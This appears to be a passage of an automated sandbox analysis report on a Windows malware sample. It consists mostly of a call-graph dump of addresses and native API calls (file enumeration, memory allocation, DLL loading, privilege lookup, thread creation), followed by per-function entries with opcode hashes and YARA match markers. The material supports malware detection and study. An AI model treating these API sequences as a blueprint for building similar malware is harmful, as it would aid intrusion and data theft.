23820->23823 23821->23820 23827 5072d0 23821->23827 23822->23730 23824 507217 23823->23824 23825 50c890 NtClose 23824->23825 23826 507222 23825->23826 23826->23730 23827->23812 23855 50c7c0 23827->23855 23830 50c890 NtClose 23831 507318 23830->23831 23831->23730 23833 50d3d0 23832->23833 23834 50c8ac NtClose 23833->23834 23834->23743 23836 50d3df 23835->23836 23836->23745 23838 50d3d0 23837->23838 23839 50ca8c RtlFreeHeap 23838->23839 23839->23751 23840->23762 23843 50e3f8 23841->23843 23852 50ca30 23841->23852 23843->23782 23845 50d3d0 23844->23845 23846 50c82c NtReadFile 23845->23846 23846->23783 23848 50e124 23847->23848 23849 50e10d 23847->23849 23848->23792 23849->23848 23850 50e3e0 RtlAllocateHeap 23849->23850 23851 50e13b 23850->23851 23851->23792 23853 50d3d0 23852->23853 23854 50ca4c RtlAllocateHeap 23853->23854 23854->23843 23856 50c7dc 23855->23856 23859 1099560 LdrInitializeThunk 23856->23859 23857 50730f 23857->23830 23859->23857 23861 4fe19c NtClose LdrInitializeThunk 23862 507023 NtReadFile NtClose RtlAllocateHeap LdrInitializeThunk 23865 50c28a LdrInitializeThunk 24633 50c88b NtClose 24635 4f5890 11 API calls 23868 50b4b0 23875 50e280 23868->23875 23870 50b5e6 23871 50b4eb 23871->23870 23878 4fb160 23871->23878 23873 50b560 Sleep 23874 50b52b 23873->23874 23874->23870 23874->23873 23876 50e2ad 23875->23876 23882 50c940 23875->23882 23876->23871 23879 4fb184 23878->23879 23880 4fb18b 23879->23880 23881 4fb1c0 LdrLoadDll 23879->23881 23880->23874 23881->23880 23883 50d3d0 23882->23883 23884 50c95c NtAllocateVirtualMemory 23883->23884 23884->23876 24674 10836e9 187 API calls _vswprintf_s 24636 5040b4 GetFileAttributesW 23885 500c95 10 API calls 24675 1082ae4 GetPEB _vswprintf_s 23907 50dea0 23908 50dec6 23907->23908 23913 4fa0f0 23908->23913 23910 50ded2 23911 50df00 23910->23911 23919 4f9100 23910->23919 23943 4fa040 23913->23943 23915 4fa104 23915->23910 23916 4fa0fd 23916->23915 23950 4fe090 23916->23950 23924 4f9127 23919->23924 23920 4f942d 23920->23911 23922 4f91e5 23922->23920 23923 50e3e0 RtlAllocateHeap 23922->23923 23925 4f91fb 23923->23925 23924->23920 24079 4fe2d0 23924->24079 23926 50e3e0 RtlAllocateHeap 23925->23926 23927 4f920c 23926->23927 23928 50e3e0 RtlAllocateHeap 23927->23928 23929 4f921a 23928->23929 24089 4fc870 23929->24089 23931 4f9227 23932 507370 7 API calls 23931->23932 23933 4f9238 23932->23933 23934 507370 7 API calls 23933->23934 23935 4f9249 23934->23935 23936 507370 7 API calls 23935->23936 23938 4f9266 23935->23938 23936->23938 23937 507370 7 API calls 23939 4f9284 23937->23939 23938->23937 23942 4f92b5 23938->23942 23939->23942 24108 4fd360 NtClose LdrInitializeThunk LdrInitializeThunk 23939->24108 23942->23920 24095 4f8d80 23942->24095 23945 4fa053 23943->23945 23944 4fa066 23944->23916 23945->23944 23958 50d750 23945->23958 23947 4fa0a3 23947->23944 23969 4f9e80 23947->23969 23949 4fa0c3 23949->23916 23952 4fe0a9 23950->23952 23951 4fa115 23951->23910 23952->23951 24071 50cbd0 23952->24071 23954 4fe0e2 23955 4fe10d 23954->23955 24074 50c660 23954->24074 23957 50c890 NtClose 23955->23957 23957->23951 23959 50d769 23958->23959 23960 507370 7 API calls 23959->23960 23961 50d781 23960->23961 23962 50d78a 23961->23962 23975 50d590 23961->23975 23962->23947 23964 50d79e 23964->23962 23988 50c300 23964->23988 23966 50e300 RtlFreeHeap 23968 50d7fc 23966->23968 23967 50d7d2 23967->23966 23968->23947 24050 4f7670 23969->24050 23971 4f9ea1 23971->23949 23972 4f9e9a 23972->23971 24063 4f7930 23972->24063 23976 50d5ab 23975->23976 23977 50d5bd 23976->23977 23978 50e280 NtAllocateVirtualMemory 23976->23978 23977->23964 23979 50d5dd 23978->23979 23992 506970 23979->23992 23981 50d600 23981->23977 23982 506970 2 API calls 23981->23982 23984 50d622 23982->23984 23984->23977 24017 507cd0 23984->24017 23985 50d6aa 24028 50c2c0 23985->24028 23987 50d712 23987->23964 23989 50c31c 23988->23989 24047 109967a 23989->24047 23990 50c337 23990->23967 23993 506981 23992->23993 23994 506989 23992->23994 23993->23981 24016 506c5c 23994->24016 24032 50f480 23994->24032 23996 5069dd 23997 50f480 RtlAllocateHeap 23996->23997 24000 5069e8 23997->24000 23998 506a36 24001 50f480 RtlAllocateHeap 23998->24001 24000->23998 24037 50f520 24000->24037 24002 506a4a 24001->24002 24003 50f480 RtlAllocateHeap 24002->24003 24005 506abd 24003->24005 24004 50f480 RtlAllocateHeap 24010 506b05 24004->24010 24005->24004 24008 50f4e0 RtlFreeHeap 24009 506c3e 24008->24009 24011 50f4e0 RtlFreeHeap 24009->24011 24043 50f4e0 24010->24043 24012 506c48 24011->24012 24013 50f4e0 RtlFreeHeap 24012->24013 24014 506c52 24013->24014 24015 50f4e0 RtlFreeHeap 24014->24015 24015->24016 24016->23981 24018 507ce1 24017->24018 24019 507370 7 API calls 24018->24019 24023 507cf7 24019->24023 24020 507d00 24020->23985 24021 507d37 24022 50e300 RtlFreeHeap 24021->24022 24024 507d48 24022->24024 24023->24020 24023->24021 24025 507d83 24023->24025 24024->23985 24026 50e300 RtlFreeHeap 24025->24026 24027 507d88 24026->24027 24027->23985 24029 50c2dc 24028->24029 24046 1099860 LdrInitializeThunk 24029->24046 24030 50c2f3 24030->23987 24033 50f490 24032->24033 24034 50f496 24032->24034 24033->23996 24035 50e3e0 RtlAllocateHeap 24034->24035 24036 50f4bc 24035->24036 24036->23996 24038 50f545 24037->24038 24039 50f57d 24037->24039 24040 50e3e0 RtlAllocateHeap 24038->24040 24039->24000 24041 50f55a 24040->24041 24042 50e300 RtlFreeHeap 24041->24042 24042->24039 24044 506c34 24043->24044 24045 50e300 RtlFreeHeap 24043->24045 24044->24008 24045->24044 24046->24030 24048 109968f LdrInitializeThunk 24047->24048 24049 1099681 24047->24049 24048->23990 24049->23990 24051 4f767b 24050->24051 24052 4f7680 24050->24052 24051->23972 24053 50e280 NtAllocateVirtualMemory 24052->24053 24054 4f76a5 24053->24054 24055 4f7708 24054->24055 24056 50c2c0 LdrInitializeThunk 24054->24056 24057 4f770e 24054->24057 24062 50e280 NtAllocateVirtualMemory 24054->24062 24066 50c9c0 24054->24066 24055->23972 24056->24054 24058 4f7734 24057->24058 24060 50c9c0 LdrInitializeThunk 24057->24060 24058->23972 24061 4f7725 24060->24061 24061->23972 24062->24054 24064 50c9c0 LdrInitializeThunk 24063->24064 24065 4f794e 24064->24065 24065->23949 24067 50c9dc 24066->24067 24070 10996e0 LdrInitializeThunk 24067->24070 24068 50c9f3 24068->24054 24070->24068 24072 50d3d0 24071->24072 24073 50cbef LookupPrivilegeValueW 24072->24073 24073->23954 24075 50c67c 24074->24075 24078 1099910 LdrInitializeThunk 24075->24078 24076 50c69b 24076->23955 24078->24076 24080 4fe2fc 24079->24080 24109 4fe1a0 24080->24109 24083 4fe329 24085 4fe334 24083->24085 24087 50c890 NtClose 24083->24087 24084 4fe341 24086 4fe352 24084->24086 24088 50c890 NtClose 24084->24088 24085->23922 24086->23922 24087->24085 24088->24086 24090 4fc886 24089->24090 24092 4fc890 24089->24092 24090->23931 24091 4fc938 24091->23931 24092->24091 24093 507370 7 API calls 24092->24093 24094 4fc9a9 24093->24094 24094->23931 24097 4f8d9a 24095->24097 24120 4fe590 24095->24120 24104 4f90f1 24097->24104 24124 506ca0 24097->24124 24099 4f8df6 24100 50f480 RtlAllocateHeap 24099->24100 24099->24104 24106 4f8f95 24100->24106 24101 4f7670 3 API calls 24101->24106 24104->23920 24106->24101 24106->24104 24107 4f7930 LdrInitializeThunk 24106->24107 24127 4fc5c0 24106->24127 24165 4fe530 24106->24165 24169 4fdf90 24106->24169 24107->24106 24108->23942 24110 4fe1ba 24109->24110 24114 4fe270 24109->24114 24115 50c380 24110->24115 24113 50c890 NtClose 24113->24114 24114->24083 24114->24084 24116 50c39c 24115->24116 24119 1099fe0 LdrInitializeThunk 24116->24119 24117 4fe264 24117->24113 24119->24117 24121 4fe59d 24120->24121 24122 4fe5bc SetErrorMode 24121->24122 24123 4fe5c3 24121->24123 24122->24123 24123->24097 24179 4fe360 24124->24179 24126 506cc6 24126->24099 24128 4fc5d9 24127->24128 24129 4fc5df 24127->24129 24196 4fdc80 24128->24196 24203 4f9bd0 24129->24203 24132 4fc5ec 24133 4fe530 LdrInitializeThunk 24132->24133 24134 4fc61c 24132->24134 24164 4fc865 24132->24164 24133->24134 24135 4fc743 24134->24135 24136 50c300 LdrInitializeThunk 24134->24136 24134->24164 24213 4fc560 LdrInitializeThunk 24135->24213 24137 4fc69a 24136->24137 24137->24135 24138 4fc6a6 24137->24138 24142 4fc6ef 24138->24142 24145 50c410 LdrInitializeThunk 24138->24145 24138->24164 24140 4fc762 24141 4fc76a 24140->24141 24214 4fc4e0 NtClose LdrInitializeThunk 24140->24214 24143 50c890 NtClose 24141->24143 24147 50c890 NtClose 24142->24147 24146 4fc774 24143->24146 24145->24142 24146->24106 24149 4fc70c 24147->24149 24148 4fc78c 24148->24141 24150 4fc793 24148->24150 24209 50b770 24149->24209 24151 4fc7ab 24150->24151 24215 4fc460 LdrInitializeThunk 24150->24215 24216 4fc2c0 NtClose LdrInitializeThunk LdrInitializeThunk 24151->24216 24153 4fc723 24153->24164 24212 4f7ae0 LdrLoadDll 24153->24212 24157 4fc739 24157->24106 24158 4fc7e3 24159 50c890 NtClose 24158->24159 24160 4fc83c 24159->24160 24161 50c890 NtClose 24160->24161 24162 4fc846 24161->24162 24162->24164 24217 4f7ae0 LdrLoadDll 24162->24217 24164->24106 24166 4fe543 24165->24166 24230 50c290 24166->24230 24170 4fdfa7 24169->24170 24171 4fdfc7 24169->24171 24170->24171 24235 4fddc0 24170->24235 24178 4fe009 24171->24178 24255 4fdc00 24171->24255 24177 507370 7 API calls 24177->24178 24178->24106 24180 4fe37d 24179->24180 24186 50c3c0 24180->24186 24183 4fe3c5 24183->24126 24187 50c3dc 24186->24187 24194 10999a0 LdrInitializeThunk 24187->24194 24188 4fe3be 24188->24183 24190 50c410 24188->24190 24191 50c42c 24190->24191 24195 1099780 LdrInitializeThunk 24191->24195 24192 4fe3ee 24192->24126 24194->24188 24195->24192 24201 4fdc9e 24196->24201 24218 4fd630 24196->24218 24198 50e3e0 RtlAllocateHeap 24199 4fddb1 24198->24199 24199->24129 24202 4fdda2 24201->24202 24225 50b5f0 24201->24225 24202->24198 24204 4f9beb 24203->24204 24205 4fe1a0 2 API calls 24204->24205 24208 4f9d01 24204->24208 24206 4f9cec 24205->24206 24207 50c890 NtClose 24206->24207 24206->24208 24207->24208 24208->24132 24210 4fe530 LdrInitializeThunk 24209->24210 24211 50b7a2 24210->24211 24211->24153 24212->24157 24213->24140 24214->24148 24215->24151 24216->24158 24217->24164 24219 4fd663 24218->24219 24220 4fe360 2 API calls 24219->24220 24221 4fd6b8 24220->24221 24222 4fd6bf 24221->24222 24229 50e420 RtlAllocateHeap 24221->24229 24222->24201 24224 4fd6cf 24224->24201 24226 50b5ff 24225->24226 24227 50b63d 24226->24227 24228 50b62a CreateThread 24226->24228 24227->24202 24228->24202 24229->24224 24231 50c2ac 24230->24231 24234 1099840 LdrInitializeThunk 24231->24234 24232 4fe56e 24232->24106 24234->24232 24236 4fddf0 24235->24236 24269 506690 24236->24269 24238 4fde41 24290 505540 24238->24290 24240 4fde47 24319 502360 24240->24319 24242 4fde4d 24346 5045c0 24242->24346 24248 4fde61 24380 505db0 24248->24380 24250 4fde67 24384 4ffca0 24250->24384 24252 4fde7f 24396 500f40 24252->24396 24256 4fdc6f 24255->24256 24257 4fdc18 24255->24257 24256->24178 24261 4fda40 24256->24261 24257->24256 24258 501180 7 API calls 24257->24258 24259 4fdc59 24258->24259 24259->24256 24603 5013d0 11 API calls 24259->24603 24262 4fda5c 24261->24262 24266 4fda77 24261->24266 24263 50c890 NtClose 24262->24263 24262->24266 24263->24266 24264 4fdbee 24264->24177 24264->24178 24265 507370 7 API calls 24265->24264 24268 4fdbd1 24266->24268 24604 4fd100 NtClose LdrInitializeThunk LdrInitializeThunk 24266->24604 24268->24264 24268->24265 24270 5066b8 24269->24270 24271 4fccf0 2 API calls 24270->24271 24273 5066ff 24271->24273 24272 506706 24272->24238 24273->24272 24401 4fcdb0 24273->24401 24275 506776 24277 5067b8 24275->24277 24287 50693b 24275->24287 24405 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24275->24405 24278 4fcdb0 LdrInitializeThunk 24277->24278 24281 5067fc 24278->24281 24279 506842 24280 4fcdb0 LdrInitializeThunk 24279->24280 24284 506872 24280->24284 24281->24279 24281->24287 24406 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24281->24406 24283 5068b8 24286 4fcdb0 LdrInitializeThunk 24283->24286 24284->24283 24284->24287 24407 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24284->24407 24289 506917 24286->24289 24287->24238 24289->24287 24408 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24289->24408 24291 5055a4 24290->24291 24292 4fccf0 2 API calls 24291->24292 24294 5056a4 24292->24294 24293 5056ab 24293->24240 24294->24293 24295 4fcdb0 LdrInitializeThunk 24294->24295 24297 505713 24295->24297 24296 505833 24296->24240 24297->24296 24298 505842 24297->24298 24414 505330 24297->24414 24299 50c890 NtClose 24298->24299 24301 50584c 24299->24301 24301->24240 24302 505748 24302->24298 24303 505753 24302->24303 24304 50e3e0 RtlAllocateHeap 24303->24304 24305 50577c 24304->24305 24306 505785 24305->24306 24307 50579b 24305->24307 24309 50c890 NtClose 24306->24309 24423 505220 CoInitialize 24307->24423 24311 50578f 24309->24311 24310 5057a9 24425 50c5a0 24310->24425 24311->24240 24313 505822 24314 50c890 NtClose 24313->24314 24315 50582c 24314->24315 24316 50e300 RtlFreeHeap 24315->24316 24316->24296 24317 5057c7 24317->24313 24318 50c5a0 LdrInitializeThunk 24317->24318 24318->24317 24320 502388 24319->24320 24321 50e3e0 RtlAllocateHeap 24320->24321 24323 5023e8 24321->24323 24322 5023f1 24322->24242 24323->24322 24430 5017c0 24323->24430 24325 50241a 24326 50243a 24325->24326 24454 501ad0 LdrLoadDll 24325->24454 24331 502458 24326->24331 24456 5040c0 GetFileAttributesW 24326->24456 24328 502428 24328->24326 24455 5020e0 7 API calls 24328->24455 24330 50244c 24457 5040c0 GetFileAttributesW 24330->24457 24334 5017c0 9 API calls 24331->24334 24335 50249f 24334->24335 24338 5024c0 24335->24338 24458 501ad0 LdrLoadDll 24335->24458 24337 5024de 24342 50e300 RtlFreeHeap 24337->24342 24338->24337 24460 5040c0 GetFileAttributesW 24338->24460 24340 5024ae 24340->24338 24459 5020e0 7 API calls 24340->24459 24341 5024d2 24461 5040c0 GetFileAttributesW 24341->24461 24344 502502 24342->24344 24344->24242 24347 5045e6 24346->24347 24473 4fe790 24347->24473 24349 504725 24350 4fde55 24349->24350 24477 5042d0 24349->24477 24352 505860 24350->24352 24353 4fde5b 24352->24353 24354 5045c0 10 API calls 24352->24354 24355 5032e0 24353->24355 24354->24353 24356 503302 24355->24356 24531 5031a0 24356->24531 24359 5031a0 10 API calls 24360 503568 24359->24360 24361 5031a0 10 API calls 24360->24361 24362 503580 24361->24362 24363 5031a0 10 API calls 24362->24363 24364 503598 24363->24364 24365 5031a0 10 API calls 24364->24365 24366 5035b0 24365->24366 24367 5031a0 10 API calls 24366->24367 24369 5035cb 24367->24369 24368 5035e5 24368->24248 24369->24368 24370 5031a0 10 API calls 24369->24370 24371 503619 24370->24371 24372 5031a0 10 API calls 24371->24372 24373 503656 24372->24373 24374 5031a0 10 API calls 24373->24374 24375 503693 24374->24375 24376 5031a0 10 API calls 24375->24376 24377 5036d0 24376->24377 24378 5031a0 10 API calls 24377->24378 24379 50370d 24378->24379 24379->24248 24381 505dcd 24380->24381 24382 4fb160 LdrLoadDll 24381->24382 24383 505de8 24382->24383 24383->24250 24385 4ffcb6 24384->24385 24393 4ffcc1 24384->24393 24386 50e3e0 RtlAllocateHeap 24385->24386 24386->24393 24387 4ffcd7 24387->24252 24388 4ffdbc GetFileAttributesW 24388->24393 24389 4fff3f 24390 4fff58 24389->24390 24391 50e300 RtlFreeHeap 24389->24391 24390->24252 24391->24390 24393->24387 24393->24388 24393->24389 24394 503720 7 API calls 24393->24394 24540 50aa90 24393->24540 24544 50a920 8 API calls 24393->24544 24394->24393 24545 500cc0 24396->24545 24398 500f4d 24560 5009a0 24398->24560 24400 4fde91 24400->24171 24402 4fcdd5 24401->24402 24409 50c490 24402->24409 24405->24277 24406->24279 24407->24283 24408->24287 24410 50c4ac 24409->24410 24413 10996d0 LdrInitializeThunk 24410->24413 24411 4fce49 24411->24275 24413->24411 24415 50534c 24414->24415 24416 4fb160 LdrLoadDll 24415->24416 24418 505367 24416->24418 24417 505370 24417->24302 24418->24417 24419 4fb160 LdrLoadDll 24418->24419 24420 50543b 24419->24420 24421 4fb160 LdrLoadDll 24420->24421 24422 505494 24420->24422 24421->24422 24422->24302 24424 505285 24423->24424 24424->24310 24426 50c5bc 24425->24426 24429 1099610 LdrInitializeThunk 24426->24429 24427 50c5db 24427->24317 24429->24427 24431 501858 24430->24431 24432 4fcdb0 LdrInitializeThunk 24431->24432 24433 501936 24432->24433 24434 501a7d 24433->24434 24468 50c520 24433->24468 24436 501a8e 24434->24436 24462 501180 24434->24462 24436->24325 24439 501a73 24440 50c890 NtClose 24439->24440 24440->24434 24441 50196f 24442 50c890 NtClose 24441->24442 24443 5019a9 24442->24443 24443->24436 24444 4fcdb0 LdrInitializeThunk 24443->24444 24445 501a05 24444->24445 24445->24436 24446 50c520 LdrInitializeThunk 24445->24446 24447 501a2a 24446->24447 24448 501a31 24447->24448 24449 501a5d 24447->24449 24451 50c890 NtClose 24448->24451 24450 50c890 NtClose 24449->24450 24452 501a67 24450->24452 24453 501a3b 24451->24453 24452->24325 24453->24325 24454->24328 24455->24326 24456->24330 24457->24331 24458->24340 24459->24338 24460->24341 24461->24337 24463 5011a5 24462->24463 24464 507370 7 API calls 24463->24464 24466 5012d7 24464->24466 24465 501391 24465->24436 24466->24465 24467 507370 7 API calls 24466->24467 24467->24465 24469 50c53c 24468->24469 24472 1099650 LdrInitializeThunk 24469->24472 24470 501964 24470->24439 24470->24441 24472->24470 24474 4fe7af 24473->24474 24475 4fe7c1 24474->24475 24476 4fe7b6 GetFileAttributesW 24474->24476 24475->24349 24476->24475 24499 50abf0 24477->24499 24479 5042e6 24480 504305 24479->24480 24481 504347 24479->24481 24487 50433b 24479->24487 24482 50432a 24480->24482 24483 50430d 24480->24483 24488 507370 7 API calls 24481->24488 24485 50e300 RtlFreeHeap 24482->24485 24484 50e300 RtlFreeHeap 24483->24484 24486 50431e 24484->24486 24485->24487 24486->24349 24487->24349 24489 50436f 24488->24489 24517 503720 24489->24517 24491 50437a 24495 504478 24491->24495 24496 504392 24491->24496 24492 50445f 24493 50e300 RtlFreeHeap 24492->24493 24494 504583 24493->24494 24494->24349 24495->24492 24528 503cb0 8 API calls 24495->24528 24496->24492 24527 503cb0 8 API calls 24496->24527 24500 50abfe 24499->24500 24501 50ac05 24499->24501 24500->24479 24502 4fb160 LdrLoadDll 24501->24502 24503 50ac37 24502->24503 24504 50e3e0 RtlAllocateHeap 24503->24504 24513 50adf9 24503->24513 24505 50ac5f 24504->24505 24506 50ac74 24505->24506 24507 50add8 24505->24507 24505->24513 24529 503800 LdrLoadDll 24506->24529 24508 50ade2 24507->24508 24509 50ae7b 24507->24509 24530 503800 LdrLoadDll 24508->24530 24512 50e300 RtlFreeHeap 24509->24512 24512->24513 24513->24479 24514 50ac8b 24514->24513 24515 50e300 RtlFreeHeap 24514->24515 24516 50adcc 24515->24516 24516->24479 24518 507370 7 API calls 24517->24518 24519 503736 24518->24519 24520 503743 24519->24520 24521 507370 7 API calls 24519->24521 24520->24491 24522 503754 24521->24522 24522->24520 24523 507370 7 API calls 24522->24523 24524 50376f 24523->24524 24525 50e300 RtlFreeHeap 24524->24525 24526 50377c 24525->24526 24526->24491 24527->24496 24528->24495 24529->24514 24530->24513 24532 5031c9 24531->24532 24533 5032cc 24532->24533 24534 503270 FindFirstFileW 24532->24534 24533->24359 24534->24533 24538 50328b 24534->24538 24535 5032b3 FindNextFileW 24537 5032c5 FindClose 24535->24537 24535->24538 24537->24533 24538->24535 24539 503080 10 API calls 24538->24539 24539->24538 24541 50aaa6 24540->24541 24543 50aba6 24540->24543 24542 507370 7 API calls 24541->24542 24541->24543 24542->24541 24543->24393 24544->24393 24546 500ce5 24545->24546 24547 4fe790 GetFileAttributesW 24546->24547 24549 500ddf 24547->24549 24548 500de6 24548->24398 24549->24548 24550 50abf0 3 API calls 24549->24550 24552 500df4 24550->24552 24551 500dfd 24551->24398 24552->24551 24553 50aa90 7 API calls 24552->24553 24555 500ed1 24552->24555 24572 500400 24552->24572 24553->24552 24556 500f29 24555->24556 24583 500760 24555->24583 24558 50e300 RtlFreeHeap 24556->24558 24559 500f30 24558->24559 24559->24398 24561 5009b6 24560->24561 24564 5009c1 24560->24564 24562 50e3e0 RtlAllocateHeap 24561->24562 24562->24564 24563 5009d7 24563->24400 24564->24563 24565 4fe790 GetFileAttributesW 24564->24565 24566 500c90 24564->24566 24569 50aa90 7 API calls 24564->24569 24570 500400 8 API calls 24564->24570 24571 500760 7 API calls 24564->24571 24565->24564 24567 500ca9 24566->24567 24568 50e300 RtlFreeHeap 24566->24568 24567->24400 24568->24567 24569->24564 24570->24564 24571->24564 24573 500426 24572->24573 24574 507370 7 API calls 24573->24574 24575 500482 24574->24575 24576 503720 7 API calls 24575->24576 24577 50048d 24576->24577 24579 500610 24577->24579 24581 5004ab 24577->24581 24578 5005f5 24578->24552 24579->24578 24580 5002d0 8 API calls 24579->24580 24580->24579 24581->24578 24589 5002d0 24581->24589 24584 500786 24583->24584 24585 507370 7 API calls 24584->24585 24586 5007f7 24585->24586 24587 503720 7 API calls 24586->24587 24588 500802 24587->24588 24588->24555 24590 5002e6 24589->24590 24593 503b90 24590->24593 24592 5003ee 24592->24581 24594 503bcd 24593->24594 24595 503c7d 24594->24595 24597 503c20 24594->24597 24600 504b70 24594->24600 24595->24592 24598 50e300 RtlFreeHeap 24597->24598 24599 503c59 24597->24599 24598->24599 24599->24592 24601 5048b0 8 API calls 24600->24601 24602 504b84 24601->24602 24602->24597 24603->24256 24604->24268 24637 50b4a4 LdrLoadDll Sleep NtAllocateVirtualMemory

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 005031A0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 00503281
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 005032BE
                                                                                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 005032C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                • Opcode ID: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                                                                                                                                                                                                                                                • Instruction ID: 002be1c0c31725dfd47f4b38e520a3c7db943b3962cfed8ee7cef057f1db01da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E31767590020ABBDB20DB64CC85FFF7B7CEB84704F144559F908A71D1EA70AB858BA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004F8D80 Relevance: 2.8, Strings: 2, Instructions: 288COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                • String ID: 7$G{@1
                                                                                                                                                                                                                                                                                                • API String ID: 2340568224-1664923512
                                                                                                                                                                                                                                                                                                • Opcode ID: aa53c5a8cc306823ca84cea33aa28c3c63cde297dbb4c2d42bcb53581226afc6
                                                                                                                                                                                                                                                                                                • Instruction ID: c37f5668f394cb3ecd43a7a1655fa1097804028933ca50b9a2e068501d76f723
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa53c5a8cc306823ca84cea33aa28c3c63cde297dbb4c2d42bcb53581226afc6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43A1A4B1D0020DABDB14DFA4CC46BEFB7B8AF44304F14855EF605A7241EB34AA448FA9
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004F8D7F Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                • String ID: 7$G{@1
                                                                                                                                                                                                                                                                                                • API String ID: 2340568224-1664923512
                                                                                                                                                                                                                                                                                                • Opcode ID: 2d3ba5a6a3680a4b8f155b1566f2027fef2ac77e3a066feabe50465860516857
                                                                                                                                                                                                                                                                                                • Instruction ID: a51a0772a75a26319eb3cd20747ddcf456a397d232e215631636d93d7c3ede67
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d3ba5a6a3680a4b8f155b1566f2027fef2ac77e3a066feabe50465860516857
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0771B5B1D0020DAADB24DBA5CC46FFEB778AF88304F10455EF61866241EB746B45CFA9
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C80A Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(005076A0,00502B68,FFFFFFFF,0050718A,00000002,?,005076A0,00000002,0050718A,FFFFFFFF,00502B68,005076A0,00000002,00000000), ref: 0050C855
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                                                                                                                                                                                                                                                • Instruction ID: c826f830bf2054b8ee98686d1005751141cdedc595607de505bff86b79205066
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF0E2B2200108AFCB14DF99DC85EEB7BADEF8C354F158208FA0DA7241C630E911CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C760 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
